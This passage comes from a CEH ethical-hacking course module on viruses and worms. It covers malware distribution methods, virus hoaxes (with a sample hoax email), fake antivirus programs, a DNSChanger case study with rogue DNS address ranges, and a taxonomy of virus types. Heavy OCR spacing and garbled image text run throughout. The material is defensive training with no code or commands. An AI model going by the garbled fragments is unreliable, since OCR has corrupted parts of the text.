A t t a c k e r s i n c o r p o r a t e v iru s e s in p o p u l a r s o f t w a r e p r o g r a m s a n d u p lo a d t h e i n f e c t e d
s o ftw a re on w e b s ite s in te n d e d to d o w n lo a d s o ftw a re . W h e n th e v ic tim

d o w n lo a d s

i n f e c t e d s o f t w a r e a n d in s ta lls it, t h e s y s te m g e ts i n f e c t e d .
©

Failing t o in s ta ll n e w v e r s io n s o r u p d a t e w i t h la t e s t p a t c h e s i n t e n d e d t o fix t h e k n o w n
b ug s m a y e x p o s e y o u r s y s te m t o viru s e s .

©

W i t h t h e in c r e a s in g t e c h n o l o g y , a tt a c k e r s also a re d e s ig n in g n e w v iru s e s . Failing t o use
la t e s t a n t i v i r u s a p p li c a t i o n s m a y e x p o s e y o u t o v i r u s a t t a c k s



Viruses and W orm s


C o m m o n T e c h n i q u e s U s e d to
D istrib u te M a lw a re o n th e W eb

H

B la c k h a t S e a rc h E n gin e
O p tim iza tio n (SEO )

CEH

M a lv e rtis in g

Ranking malware pages highly
in search results

Embedding malware in ad-networks
that display across hundreds of
legitimate, high-traffic sites

S o c ia l E n g in eered
C lic k -ja c k in g

C o m p ro m ise d L e g itim a te
W e b sites

Tricking users into clicking on
innocent-looking webpages

Hosting embedded malware that
spreads to unsuspecting visitors

S p e a rp h is h in g S ites

Drive-by D o w n lo ad s

Mimicking legitimate institutions,
such as banks, in an attempt to
steal account login credentials

‫^ ״‬
‫ ן ן ו‬jl.

Exploiting flaws in browser
software to install malware
just by visiting a web page
Source: Security Threat Report 2012 (http://www.sophos.com )
Copyright © by

^

-C

C o m m o n T e c h n i q u e s U s e d to D i s t r i b u t e M a l w a r e o n
th e W eb

S o u rc e : S e c u r ity T h r e a t R e p o r t 2 0 1 2 ( h t t p : / / w w w . s o p h o s . c o m )

Blackhat Search Engine Optimization (SEO): U s in g t h is t e c h n i q u e t h e a t t a c k e r r a n k s m a l w a r e
p a g e s h ig h in se arch re s u lts

Social Engineered Click-jacking: T h e a t t a c k e r s t r i c k t h e users i n t o c lic k in g o n i n n o c e n t - l o o k i n g
w e b p ages t h a t c o n t a i n m a l w a r e

Spearphishing Sites: T his t e c h n i q u e is used f o r m im i c k i n g l e g i t i m a t e in s t it u t i o n s , such as ban ks,
in an a t t e m p t t o ste al a c c o u n t lo g in c r e d e n t i a l s

Malvertising: E m b e d s m a l w a r e in ad n e t w o r k s t h a t d is p la y ac ro s s h u n d r e d s o f l e g i t i m a t e , h ig h t r a f f i c sites

Compromised Legitimate W ebsites: H o s t e m b e d d e d m a l w a r e t h a t s p re a d s t o u n s u s p e c t i n g
v is ito rs

Drive-by Downloads: T h e a t t a c k e r e x p l o i t s f l a w s in b r o w s e r s o f t w a r e t o in s ta ll m a l w a r e j u s t by
v is itin g a w e b p age



Viruses and W orm s


Virus Hoaxes and Fake
Antiviruses
A tta c k e rs d is g u is e m a lw a r e s as a n a n t iv ir u s
a n d t r ic k u s e rs t o in s ta ll th e m in t h e ir

c o n ta in v ir u s a tta c h m e n ts

s y s te m s

W a r n in g m e s s a g e s p r o p a g a tin g t h a t a

O n c e in s ta lle d th e s e fa k e a n tiv iru s e s c a n

c e r ta in e m a il m e s s a g e s h o u ld n o t b e v ie w e d

d a m a g e t a r g e t s y s te m s s im ila r t o o t h e r

a n d d o in g s o w ill d a m a g e o n e 's s y s te m

J

H o axes a re fa ls e a la rm s c la im in g r e p o r ts
a b o u t a n o n - e x is tin g v ir u s w h ic h m a y

J

m a lw a re s

ntAsc rmv/Aflo m u warning among rniCNDS.rAMiiv and contacts Ho* •houM t* »k«t d*'•*
tbv mat fmv Jwyv Co ikx cptn «1» i‫׳‬i«im«« with 4 1etMchmvH vntlltvO >OSTCAAO 'ROM •Uir.O ■
y
1
RtMONATION Of BARACK OBAMA . regjrdl«»l0f WhO sent IttO you It IS J vlruStlWt Opers A
KttrtAftUlMAOt, then Dim* th -whole run) C a « ol YOU' computer.
«
rih b lIvmNHMlWdiliuumnl UyCNN Uni

1

Im Hid) U• I
k
••

jy M lllW A

1
4

(*•sif jctivtvirasawf Thevirw ...1 .discoveredbv McAfee v«terdiv. «ndthp‫׳‬p nortear

1>

A W C

*
*
*

tifa ft-0WI1 1l'W« IN MN'R NV M A n NA
i* F R A r)T4 AN flA 0 n lF 0 tA IIV NrOT rn

l ‫ «י‬HUM

j*for :h&

tSeZeto Setloiof llie llodDiM., mIivictl.r viulxifoimatbonk«vL

»‫׳‬
—
wi ss*‫־‬
f rr‫•־‬
‫״‬
‫״‬

jy y |r J !!L
l:
—

=«=— ‫נ‬

0llicil. All Rights Reserved. Reproduction is Strictly Prohibited.

Copyright © by E GG

V iru s H o ax e s a n d F a k e A n tiv iru s e s
V iru s H o a x e s
A v ir u s h o a x is s i m p l y a b lu ff. V iru s e s , by t h e i r n a t u r e , h a v e a lw a y s c r e a te d a
h o r r i f y i n g i m p r e s s io n . H oa x es a re t y p i c a l l y u n t r u e sca re a le r t s t h a t u n s c r u p u l o u s in d iv id u a ls
s e n d t o c r e a te h a v o c . It is f a i r l y c o m m o n f o r i n n o c e n t users t o pass th e s e p h o n y m essa ge s
a lo n g t h i n k i n g t h e y a re h e lp in g o t h e r s a v o id t h e " v i r u s . "
©

H oa xes a re fa lse a la r m s c la im in g r e p o r t s a b o u t n o n - e x i s t i n g v iru s e s

©

T he se w a r n i n g m essages, w h i c h can b e p r o p a g a t e d r a p id ly , s t a t in g t h a t ac e r ta in

e m a il

m e s s a g e s h o u ld n o t be o p e n e d , a n d t h a t d o i n g so w o u l d d a m a g e o n e 's s y s te m
©

In s o m e cases, th e s e w a r n i n g m essa ge s t h e m s e l v e s c o n t a i n v iru s a t t a c h m e n t s

©

T he se possess t h e c a p a b i l it y o f v a s t d e s t r u c t i o n o n t a r g e t s y s te m s

M a n y h o a x e s t r y t o " s e l l" t h in g s t h a t a re t e c h n i c a l l y n o n s e n s e . N e v e rth e le s s , t h e h o a x e r has t o
be s o m e w h a t o f an e x p e r t t o s p re a d h o a x e s in o r d e r t o a v o id b e in g i d e n t if ie d a n d c a u g h t.
T h e r e f o r e , it is a g o o d p r a c tic e t o lo o k f o r t e c h n i c a l d e t a i ls a b o u t h o w t o b e c o m e i n f e c t e d . A lso
se arch f o r i n f o r m a t i o n in t h e w i ld t o le a rn m o r e a b o u t t h e h o a x , e s p e c ia lly by s c a n n in g b u l l e t i n
b o a r d s w h e r e p e o p le a c tiv e ly discuss c u r r e n t h a p p e n in g s in t h e c o m m u n i t y .



Viruses and W orm s


T ry t o c ro s s c h e c k t h e i d e n t i t y o f t h e p e r s o n w h o has p o s te d t h e w a r n i n g . A lso l o o k f o r m o r e
i n f o r m a t i o n a b o u t t h e h o a x / w a r n i n g f r o m s e c o n d a r y s o u rc e s . B e fo re j u m p i n g t o c o n c lu s io n s by
r e a d in g c e r t a i n d o c u m e n t s o n t h e I n t e r n e t , c h e c k t h e f o l l o w i n g :
Q

If it is p o s te d

by n e w s g r o u p s t h a t a re s u s p ic io u s , c r o s s c h e c k t h e i n f o r m a t i o n w i t h

a n o th e r source
©

If t h e p e r s o n w h o has p o s te d t h e n e w s is n o t a k n o w n p e r s o n in t h e c o m m u n i t y o r an
e x p e r t , c ro s s c h e c k t h e i n f o r m a t i o n w i t h a n o t h e r s o u r c e

0

If a g o v e r n m e n t b o d y has p o s te d t h e n e w s , t h e p o s tin g s h o u ld also h a v e a r e f e r e n c e t o
th e c o rre s p o n d in g fe d e ra l r e g u la tio n

Q

O n e o f t h e m o s t e f f e c t i v e c h e c k s is t o lo o k u p t h e s u s p e c te d h o a x v i r u s b y n a m e o n
a n t i v i r u s s o f t w a r e v e n d o r sites

Q

If t h e p o s tin g is te c h n ic a l, h u n t f o r sites t h a t w o u l d c a t e r t o t h e t e c h n i c a l i t i e s , a n d t r y t o
a u th e n tic a te th e in fo rm a tio n
Subject: FORWARD THIS W ARNIN G A M O N G FRIENDS, FAMILY AND CONTACTS
PLEASE FORWARD THIS WARNING AM O N G FRIENDS, FAMILY AND CONTACTSI You should be alert during
the next few days. Do not open any message with an attachment entitled 'POSTCARD FROM BEJING or
'RESIGNATION OF 8ARACK O B A M A , regardless of who sent it to you. It is a virus that opens A
POSTCARD IMAGE, then 'burns' the whole hard C disc of your computer.
This is the worst virus announced by CNN last evening. It has been classified by Microsoft as the most
destructive virus ever. The virus was discovered by McAfee yesterday, and there is no repair yet for this
kind of virus.
This virus simply destroys the Zero Sector of the Hard Disc, where the vital information is kept.
COPY THIS E MAIL, AND SEND IT TO YOUR FRIENDS.REMEMBER: IF YOU SEND IT TO THEM , YOU WILL
BENEFIT ALL OF US.
End-of-mail
Thanks.

FIGURE 7.3: Hoaxes Warning Message

F a k e A n tiv iru s e s
Fake a n tiv ir u s e s is a m e t h o d o f a f f e c t i n g a s y s te m b y h a c k e rs a n d it can p o is o n y o u r
s y s te m a n d o u t b r e a k t h e r e g is t r y a n d s y s te m file s t o a l l o w t h e a t t a c k e r t o t a k e f u ll c o n t r o l a n d
access t o y o u r c o m p u t e r . It a p p e a rs a n d p e r f o r m s s i m i l a r l y t o a real a n t i v i r u s p r o g r a m .
Fake a n t i v i r u s p r o g r a m s f i r s t a p p e a r o n d i f f e r e n t b r o w s e r s a n d w a r n users t h a t t h e y h ave
d i f f e r e n t s e c u r i t y t h r e a t s o n t h e i r s y s te m , a n d t h is m e s s a g e is b a c k e d u p b y r e a l s u s p ic io u s
v iru s e s . W h e n t h e u s e r tr ie s t o r e m o v e t h e v ir u s e s , t h e n t h e y a re n a v ig a te d t o a n o t h e r p age
w h e r e t h e y n e e d t o b u y o r s u b s c r ib e t o t h a t a n t i v i r u s a n d p r o c e e d t o p a y m e n t d e ta ils . T he se
f a k e a n t i v i r u s p r o g r a m s a re b e e n f a b r i c a t e d in s u ch a w a y t h a t t h e y d r a w t h e a t t e n t i o n o f t h e
u n s u s p e c t i n g u s e r i n t o in s t a llin g t h e s o f t w a r e .
S o m e o f t h e m e t h o d s used t o e x t e n d t h e usage a n d in s t a l l a t i o n o f fa k e a n t i v i r u s p r o g r a m s
in c lu d e :
©

E m a il a n d m e s s a g in g : A t t a c k e r s use s p a m e m a il a n d social n e t w o r k i n g m e ss a g e s t o
s p re a d t h is t y p e o f i n f e c t e d e m a il t o users a n d p r o b e t h e u s e r t o o p e n t h e a t t a c h m e n t s
f o r s o f t w a r e i n s t a lla t io n .



Viruses and W orm s

Q


Search e n g in e o p tim iz a tio n : A t t a c k e r s g e n e r a t e p ages r e la t e d t o

p u b lic o r c u r r e n t

s e a rch t e r m s a n d p la n t t h e m t o a p p e a r as e x t r a o r d i n a r y a n d t h e la t e s t in s e a rch e n g in e
r e s u lts . T h e w e b p ages s h o w a le rts a b o u t i n f e c t i o n t h a t e n c o u r a g e t h e u s e r t o b u y t h e
fa k e a n tiv ir u s .
Q

C o m p ro m is e d w e b s ite s : A t t a c k e r s s e c r e t l y b r e a k i n t o p o p u l a r sites t o in s ta ll t h e fa k e
a n tiv ir u s e s , w h i c h can be used t o e n tic e users t o d o w n l o a d t h e f a k e a n t i v i r u s b y r e ly in g
o n t h e s ite 's p o p u l a r i t y .

J
a
Protection

a

- acy
‫׳‬w

I
P a th

q

0,

'S (‫י‬

M
p 0 < *© ‫ י#י*י‬S
« M1 r»
4

Inlrctiom

I

C w » C « C ^ S JN t5 ^ c ^ « U Jr^ 4 ifV * g 0 a 5 7 2

35

SMtWI

FIGURE 7.4: Example of a Fake Antivirus



Viruses and W orm s


Virus Analysis: DNSChanger
DNSChanger (Alureon) modifies the DNS
settings on the victim PC to divert
Internet traffic to malicious websites in
order to generate fraudulent ad revenue,
sell fake services, or steal personal
financial information

CEH

J

<W >

It acts as a bot and can be organized into a
BotNet and controlled from a remote
location

J

It spreads through emails, social
engineering tricks, and untrusted
downloads from the Internet

UHU

$
DNSChanger malware achieves the DNS
redirection by modifying the following
registry key settings against a interface
device such as network card

HKEY_LOCAL_MACHINESYSTEMCurrentControl
SetServicesTcpipParameterslnterfaces%Ra
ndom C %NameServer
LSID

t
J

<K >

DNSChanger has received significant
attention due to the large number of
affected systems worldwide and the fact
that as part of the BotNet takedown the FBI
took ownership of the rogue DNS servers to
ensure those affected did not immediately
lose the ability to resolve DNS names

http://www. totaldefense. com
Copyright © by E&Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited.

V iru s A n a ly sis: D N S C h a n g e r
S o u rc e : h t t p : / / w w w . t o t a l d e f e n s e . c o m
D N S C h a n g e r ( A l u r e o n ) is m a l w a r e t h a t s p re a d s t h r o u g h e m a ils , s o c ia l e n g i n e e r i n g tr i c k s , a nd
u n t r u s t e d d o w n l o a d s f r o m t h e I n t e r n e t . It a cts as a b o t a n d can be o rg a n iz e d i n t o a b o t n e t a nd
c o n t r o l l e d f r o m a r e m o t e l o c a tio n . T his m a l w a r e a c h ie v e s DNS r e d i r e c t i o n b y m o d i f y i n g t h e
s y s te m r e g is t r y k e y s e ttin g s a g a in s t an i n t e r f a c e d e v ic e such as n e t w o r k c a rd .
D N S C h a n g e r has r e c e iv e d s i g n ific a n t a t t e n t i o n d u e t o t h e large n u m b e r o f a f f e c t e d s y s te m s
w o r l d w i d e a n d t h e f a c t t h a t as p a r t o f t h e b o t n e t t a k e d o w n , t h e FBI t o o k o w n e r s h i p o f r o g u e
DNS s e r v e r s t o e n s u r e t h o s e a f f e c t e d d id n o t i m m e d i a t e l y lose t h e a b i l it y t o re s o lv e DNS
n a m e s . T his can e v e n m o d i f y t h e DNS s e ttin g s o n t h e v i c t i m ' s PC t o d i v e r t I n t e r n e t t r a f f i c t o
m a lic io u s w e b s i t e s in o r d e r t o g e n e r a t e f r a u d u l e n t a d r e v e n u e , sell f a k e s e rv ic e s , o r ste al
p e r s o n a l f in a n c ia l i n f o r m a t i o n .



Viruses and W orm s


Virus Analysis: DNSChanger
( C o n t ’d )

The rogue DNS servers can exist in any of the following ranges:
L

DNSChanger

64.28.176.0 - 64.28.191.255, 67.210.0.0 - 67.210.15.255
77.67.83.0 - 77.67.83.255, 93.188.160.0 - 93.188.167.255
85.255.112.0 - 85.255.127.255, 213.109.64.0 - 213.109.79.255

DNSChanger sniffs the
credential and redirects the
request to real website
Real Website
ww.xrecyritY-tP1
IP: 200.0.0.45

DNSChanger infects victim's
computer by change her DNS IP
address to: 64.28.176.2

Attacker runs DNS Server in
Russia (IP: 64.28.176.2)

http://www. tota!defense,com


tout V i r u s A n a l y s i s : D N S C h a n g e r ( C o n t ’d)
’

S o u rc e : h t t p : / / w w w . t o t a l d e f e n s e . c o m

T h e r o g u e DNS s e rv e rs can e x is t in a n y o f t h e f o l l o w i n g ran ge s:

64.28.176.0 - 64.28.191.255 , 67.210.0.0 ‫552.51.012.76 ־‬
77.67.83.0 - 77.67.83.255 , 93.188.160.0 - 93.188.167.255
85.255.112.0 - 85.255.127.255 , 213.109.64.0 - 213.109.79.255



Viruses and W orm s


W h al is the IP
address of
w w w . *security. corn

©

>

DNSChanger sniffs the
credential and redirects the
request to real website

Fake Website
IP: 65.0.0.2

»

‫י‬
Real Website
wvAv.xsecuritv.com
IP: 200.0.0.45

©

DNS Request do
to 64.28.176.2

>
DNSChanger infects victim's
computer by change her DNS IP
address to: 64.28.176.2

©

□
Attacker runs DNS Server in
Russia (IP: 64.28.176.2)

FIGURE 7.5: Virus Analysis Using DNSChanger

T o in f e c t t h e s y s te m a nd s te a l c r e d e n tia ls , t h e a t t a c k e r has t o f i r s t ru n DNS s e rv e r. H e re t h e
a t t a c k e r r u n s his o r h e r D N S s e r v e r in Russia w i t h an IP o f, say, 6 4 .2 8 . 1 7 6 . 2 . N e x t, t h e a t t a c k e r
i n f e c ts t h e v i c t i m ' s c o m p u t e r by c h a n g in g his o r h e r DNS IP a d d re s s t o : 6 4 .2 8 .1 7 6 .2 . W h e n th is
m a l w a r e has i n f e c t e d t h e s y s te m , it e n t i r e l y c h a n g e s t h e DNS s e ttin g s o f t h e i n f e c t e d m a c h in e
a n d fo r c e s all t h e DNS r e q u e s t t o g o t o t h e D N S s e rv e r ru n b y t h e a tta c k e r . A f t e r a lt e r in g th e
s e t t i n g o f t h e DNS, a n y r e q u e s t t h a t is m a d e b y t h e s y s te m is s e n t t o t h e m a l i c io u s DNS s e r v e r .
H e re , t h e

v ic tim

sent

DNS

Request

‫״‬w h a t

is t h e

IP a d d re s s

o f w w w .x s e c u rity .c o m ‫״‬

to

( 6 4 .2 8 .1 7 6 .2 ). T h e a t t a c k e r g a v e a re s p o n s e t o t h e r e q u e s t as w w w . x s e c u r i t v . c o m . w h i c h is
l o c a te d a t 6 5 .0 .0 .2 . W h e n v i c t i m ' s b r o w s e r c o n n e c t s t o 6 5 .0 .0 .2 , it r e d ir e c ts h im o r h e r t o a fa k e
w e b s i t e c r e a te d b y t h e a t t a c k e r w i t h IP: 6 5 .0 .0 .2 . D N S C h a n g e r s n iffs t h e c r e d e n t i a l (u s e r n a m e ,
p a s s w o r d s ) a n d r e d ir e c ts t h e r e q u e s t t o real w e b s i t e (w w w . x s e c u r i t y . c o m ) w i t h IP: 2 0 0 .0 .0 .4 5 .


Ethical Hacking and C ounterm easures Copyright © by EC-C0l1nCil

Viruses and W orm s


M odule Flow

CEH

V iru s and
W orm s
C on cep ts

C o m p uter
W orm s

P en etratio n
Testing

C ounter•
m easures

M a lw a re
Analysis

Copyright © by E&Caincil. All Rights Reserved. Reproduction is Strictly Prohibited.

■ = || M o d u l e F l o w
P r io r t o th is , w e h a v e d is cu sse d a b o u t v iru s e s a n d w o r m s . N o w w e w i ll discuss a b o u t
d i f f e r e n t ty p e s o f viru s e s .

V iru s a n d W o rm s C o nc e p t

i •

y

—

v‫׳‬

C

X

M a lw a r e A nalysis

T y p e s o f V ir u s e s


C o u n te rm e a s u re s

^

)

P e n e tra tio n T es tin g

—

This s e c tio n d e s c r ib e s a b o u t d i f f e r e n t ty p e s o f V iru se s.



Viruses and W orm s

System or
Boot Sector
Viruses


Stealth Virus/
Tunneling
Virus

Cluster
Viruses

Encryption

Polymorphic

Metamorphic

Sparse
Infector
Virus

Direct Action
or Transient

Multipartite

T y p e s of V iru se s
So fa r, w e h a v e d iscu ss e d v a r io u s v ir u s a n d w o r m

c o n c e p ts . N o w w e w ill discuss

v a r io u s t y p e s o f viru s e s .
T his s e c tio n h ig h lig h ts v a r io u s ty p e s o f v iru s e s a n d w o r m s such as file a n d m u l t i p a r t i t e v ir u s e s ,
m a c r o v iru s e s , c lu s t e r viru s e s , s t e a l t h / t u n n e l i n g

v iru s e s , e n c r y p t i o n

v iru s e s , m e t a m o r p h i c

v iru s e s , shell viru s e s , a n d so o n . C o m p u t e r v iru s e s a re t h e m a l i c io u s s o f t w a r e p r o g r a m s w r i t t e n
by a t ta c k e r s t o i n t e n t i o n a l l y e n t e r t h e t a r g e t e d s y s te m w i t h o u t t h e u s e r 's p e r m i s s i o n . As a
re s u lt, t h e y a f f e c t t h e s e c u r it y s y s te m a n d p e r f o r m a n c e o f t h e m a c h in e . A f e w o f t h e m o s t
c o m m o n ty p e s o f c o m p u t e r v iru s e s t h a t a d v e r s e l y a f f e c t s e c u r it y s y s te m s a re d iscu s se d in
d e ta il o n t h e f o l l o w i n g slides.

T y p e s of V iru se s
V iru s e s a re cla s s ifie d d e p e n d i n g o n t w o c a te g o r ie s :
Q

W h a t Do T h e y In fe c t?

©

H o w Do T h e y In fe c t?



Viruses and W orm s


W hat Do They In fe ct?
System or Boot Sector V iruses
_

f*.

T h e m o s t c o m m o n t a r g e t s f o r a v iru s a re t h e s y s te m s e c to rs , w h i c h a re n o t h i n g b u t

t h e M a s t e r B o o t R e c o rd a n d t h e DOS B o o t R e c o rd S y s t e m s e c to r s . T h e s e a re t h e a re a s o n th e
d isk t h a t are e x e c u t e d w h e n t h e PC is b o o t e d . E ve ry d isk has a s y s te m s e c to r o f s o m e s o rt. T h e y
s p e c ia lly in f e c t t h e f l o p p y b o o t s e c to r s a n d r e c o r d s o f t h e h a rd disk. For e x a m p le : Disk K iller
a n d S to n e v iru s .

F ile V iruses
E x e c u ta b le file s a re i n f e c t e d b y file v iru s e s , as t h e y i n s e r t t h e i r c o d e i n t o t h e o r ig in a l
file a n d g e t e x e c u te d . File v iru s e s a re la r g e r in n u m b e r , b u t t h e y a re n o t t h e m o s t c o m m o n l y
f o u n d . T h e y i n f e c t in a v a r i e t y o f w a y s a n d can be f o u n d in a la rg e n u m b e r o f file ty p e s .

M u ltip a rtite V irus
T h e y i n f e c t p r o g r a m file s, a n d t h is f ile in t u r n a ffe c ts t h e b o o t s e c to r s su ch as In v a d e r ,
Flip, a n d T e q u ila .

C lu ste r V iruses
C lu s te r v iru s e s i n f e c t file s w i t h o u t c h a n g in g t h e f ile o r p la n t in g e x tr a file s ; t h e y c h a n g e
t h e DOS d i r e c t o r y i n f o r m a t i o n so t h a t e n t r i e s p o i n t t o t h e v ir u s c o d e in s te a d o f t h e a c tu a l
p ro g ra m .

M acro V irus
M i c r o s o f t W o r d o r a s i m i l a r a p p li c a t i o n can be i n f e c t e d t h r o u g h a c o m p u t e r v iru s
c a lle d a m a c r o v iru s , w h i c h a u t o m a t i c a l l y p e r f o r m s a s e q u e n c e o f a c tio n s w h e n t h e
a p p li c a t i o n is t r i g g e r e d o r s o m e t h i n g else. M a c r o v iru s e s a re s o m e w h a t less h a r m f u l t h a n o t h e r
ty p e s . T h e y a re u s u a lly s p re a d via an e m a il.

How Do They In fe ct?
‫־־‬
‫׳‬

■

Stealth V iruses
T h e se v iru s e s t r y t o h id e t h e m s e l v e s f r o m a n t i v i r u s p r o g r a m s b y a c t i v e l y a l t e r i n g a n d

c o r r u p t i n g t h e c h o s e n s e rv ic e call i n t e r r u p t s w h e n t h e y a re b e in g ru n . R e q u e s ts t o p e r f o r m
o p e r a t i o n s in r e s p e c t t o th e s e se rv ic e call i n t e r r u p t s a re r e p la c e d by v iru s c o d e . T h e se v iru s e s
s ta te fa lse i n f o r m a t i o n t o h id e t h e i r p r e s e n c e f r o m a n t i v i r u s p r o g r a m s . For e x a m p le , t h e s te a lth
v ir u s h id e s t h e o p e r a t i o n s t h a t it m o d i f i e d a n d g ive s fa ls e r e p r e s e n t a t i o n s . T hus, it ta k e s o v e r
p o r t i o n s o f t h e t a r g e t s y s te m a nd h id e s its v i r u s c o d e .
Life‫:־‬

T u n n elin g V iruses
T h e s e v ir u s e s t r a c e t h e s te p s o f i n t e r c e p t o r p r o g r a m s t h a t m o n i t o r o p e r a t i n g s y s te m

r e q u e s ts so t h a t t h e y g e t i n t o BIOS a n d DOS t o in s ta ll th e m s e lv e s . T o p e r f o r m t h is a c tiv it y , t h e y
even tu n n e l u n d e r a n tiv iru s s o ftw a re p ro g ra m s.



Viruses and W orm s

c_ —


E n cry p tio n V iruses
T his t y p e o f v ir u s c o n s is ts o f an e n c r y p t e d c o p y o f t h e v iru s a n d a d e c r y p t i o n m o d u l e .

T h e d e c r y p t i n g m o d u l e r e m a in s c o n s t a n t , w h e r e a s t h e d i f f e r e n t keys a re u sed f o r e n c r y p t i o n .

iri)
, ‫״ ״‬

P o ly m o rp h ic V iruses
T h e s e v iru s e s w e r e d e v e lo p e d t o c o n f u s e a n t i v i r u s p r o g r a m s t h a t scan f o r v iru s e s in

t h e s y s te m . It is d i f f i c u l t t o t r a c e t h e m , since t h e y c h a n g e t h e i r c h a r a c te r is t ic s e a ch t i m e t h e y
in f e c t, e.g., e v e r y c o p y o f t h is v ir u s d if f e r s f r o m its p r e v io u s o n e . V i r u s d e v e l o p e r s h a v e e v e n
c r e a t e d m e t a m o r p h i c e n g in e s a n d v ir u s w r i t i n g t o o l k its t h a t m a k e t h e c o d e o f an e x is t in g v ir u s
lo o k d i f f e r e n t f r o m o t h e r s o f its k in d .

M e ta m o rp h ic V iruses
A c o d e t h a t can r e p r o g r a m it s e lf is c a lle d m e t a m o r p h i c c o d e . T his c o d e is t r a n s l a t e d
i n t o t h e t e m p o r a r y c o d e , a n d t h e n c o n v e r t e d b a ck t o t h e n o r m a l c o d e . T his t e c h n i q u e , in w h i c h
t h e o rig in a l a l g o r i t h m r e m a in s in t a c t, is u sed t o a v o id p a t t e r n r e c o g n i t i o n o f a n t i v i r u s s o f t w a r e .
T his is m o r e e f f e c t i v e in c o m p a r i s o n t o p o l y m o r p h i c c o d e . T his t y p e o f v iru s c o n s is ts o f c o m p le x
e x te n s iv e c o d e .

O v erw ritin g F ile or C avity V iruses
S o m e p r o g r a m file s h a v e a re as o f e m p t y space. T his e m p t y sp ace is t h e m a in t a r g e t o f
th e s e viru s e s . T h e C a v i t y V ir u s , also k n o w n as t h e S pace F ille r V ir u s , s to r e s its c o d e in th is
e m p t y space. T h e v ir u s in s ta lls it s e lf in th is u n o c c u p ie d sp ace w i t h o u t a n y d e s t r u c t io n t o t h e
o rig in a l c o d e . It in s ta lls it s e lf in t h e file it a t t e m p t s t o in f e c t.

S parse In fec to r V iruses

a®

A sp arse i n f e c t o r v iru s i n f e c ts o n l y o c c a s i o n a l l y (e.g., e v e r y t e n t h p r o g r a m e x e c u te d )

o r o n l y file s w h o s e le n g t h s fa ll w i t h i n a n a r r o w ra n g e .

C o m p an io n V iruses
T h e c o m p a n i o n v ir u s s to re s it s e lf b y h a v in g t h e i d e n t i c a l f i l e n a m e as t h e t a r g e t e d
p r o g r a m file . As s o o n as t h a t f ile is e x e c u t e d , t h e v ir u s in f e c ts t h e c o m p u t e r , a nd h a r d d is k d a ta
is m o d if ie d .

C am o u flag e V iruses

^
W

-------- T h e y d is g u is e t h e m s e l v e s as g e n u in e a p p li c a t i o n s

o f t h e user. T he se v iru s e s a re n o t

d i f f i c u l t t o f i n d since a n t i v i r u s p r o g r a m s h a v e a d v a n c e d t o t h e p o i n t w h e r e such v iru s e s are
e a sily t r a c e d .

Shell V iruses
_____

T his v ir u s c o d e f o r m s a la y e r a r o u n d t h e t a r g e t h o s t p r o g r a m 's c o d e t h a t can be



Viruses and W orm s


c o m p a r e d t o an " e g g s h e l l / ‫ ׳‬m a k in g i t s e lf t h e o rig in a l p r o g r a m a n d t h e h o s t c o d e its s u b r o u t i n e . H e re , t h e o rig in a l c o d e is m o v e d t o a n e w l o c a t io n by t h e v ir u s c o d e a n d t h e v i r u s
a s s u m e s its i d e n t it y .

F ile E xtension V iru ses
F.
File e x t e n s i o n v ir u s e s c h a n g e t h e e x te n s io n s o f file s ; .TXT is safe, as it in d ic a te s a p u r e
t e x t file . If y o u r c o m p u t e r 's f i l e e x t e n s i o n s v i e w is t u r n e d o f f a n d s o m e o n e s e n d s y o u a file
n a m e d BA D .T X T .V B S , y o u w i ll see o n l y B A D .TXT.

> '« f| Add -on V iru ses
M o s t v iru s e s a re a d d - o n v iru s e s . T his t y p e o f v ir u s a p p e n d s its c o d e t o t h e b e g in n in g
o f t h e h o s t c o d e w i t h o u t m a k in g a n y c h a n g e s t o t h e l a t t e r . T hu s , t h e v ir u s c o r r u p t s t h e s t a r t u p
i n f o r m a t i o n o f t h e h o s t c o d e , a n d places it s e lf in its p la ce, b u t it d o e s n o t t o u c h t h e h o s t c o d e .
H o w e v e r , t h e v iru s c o d e is e x e c u t e d b e f o r e t h e h o s t c o d e . T h e o n l y in d i c a t i o n t h a t t h e file is
c o r r u p t e d is t h a t t h e size o f t h e file has in c re a s e d .

In tru siv e V iruses
‫־־‬

T his f o r m o f v ir u s o v e r w r i t e s its c o d e e i t h e r b y c o m p l e t e l y r e m o v i n g t h e t a r g e t h o s t's

p r o g r a m c o d e , o r s o m e t i m e s it o n l y o v e r w r i t e s p a r t o f it. T h e r e f o r e , t h e o rig in a l c o d e is n o t
e x e c u te d p r o p e r ly .

D irec t A ction or T ra n sie n t V iruses
T r a n s fe r s all c o n t r o l s t o t h e h o s t c o d e w h e r e it reside s, se le c ts t h e t a r g e t p r o g r a m t o
be m o d if ie d , a nd c o r r u p t s it.

=—

T e rm in a te a n d Stay R e sid en t V iru ses (TSRs)

ffr

A TSR v i r u s r e m a in s p e r m a n e n t l y in m e m o r y d u r in g t h e e n t i r e w o r k se ssio n, e v e n

a f t e r t h e t a r g e t h o s t p r o g r a m is e x e c u te d a n d t e r m i n a t e d . It can be r e m o v e d o n l y b y r e b o o t i n g
t h e s y s te m .



Viruses and W orm s


System or Boot Sector Viruses CEH
Boot Sector Virus
Boot sector virus moves MBR to
another location on the hard disk
and copies itself to the original
location of MBR

Execution
©

o

When system boots, virus
code is executed first and then
control is passed to original
MBR

Before Infection

After Infection

Virus Code

MBR
Copyright © by E&

S y s te m o r B oot S e c to r V iru s e s
m

S y s te m s e c t o r v iru s e s can be d e f i n e d as t h o s e t h a t a f f e c t t h e e x e c u t a b l e c o d e o f t h e

disk, r a t h e r t h a n t h e b o o t s e c t o r v ir u s t h a t a ffe c ts t h e DOS b o o t s e c t o r o f t h e disk. A n y s y s te m
is d iv i d e d i n t o a reas, c a lle d s e c to rs , w h e r e t h e p r o g r a m s a re s to r e d .
T h e t w o ty p e s o f s y s te m s e c to r s are:
Q

M B R ( M a s te r B o o t R ecord)
M BR s a re t h e m o s t v i r u s - p r o n e z o n e s b e c a u s e if t h e M B R is c o r r u p t e d , all d a ta w i ll be
lost.

0

DBR (DO S B o ot R ecord)
T h e DOS b o o t s e c t o r is e x e c u t e d w h e n e v e r t h e s y s te m is b o o t e d . T his is t h e c r u c ia l
p o i n t o f a t t a c k f o r viru s e s .

T h e s y s te m s e c t o r co n s is ts o f 5 1 2 b y t e s o f m e m o r y . Because o f th is , s y s te m s e c t o r v iru s e s
c o n c e a l t h e i r c o d e in s o m e o t h e r d isk space. T h e m a in c a r r i e r o f s y s te m s e c t o r v iru s e s is t h e
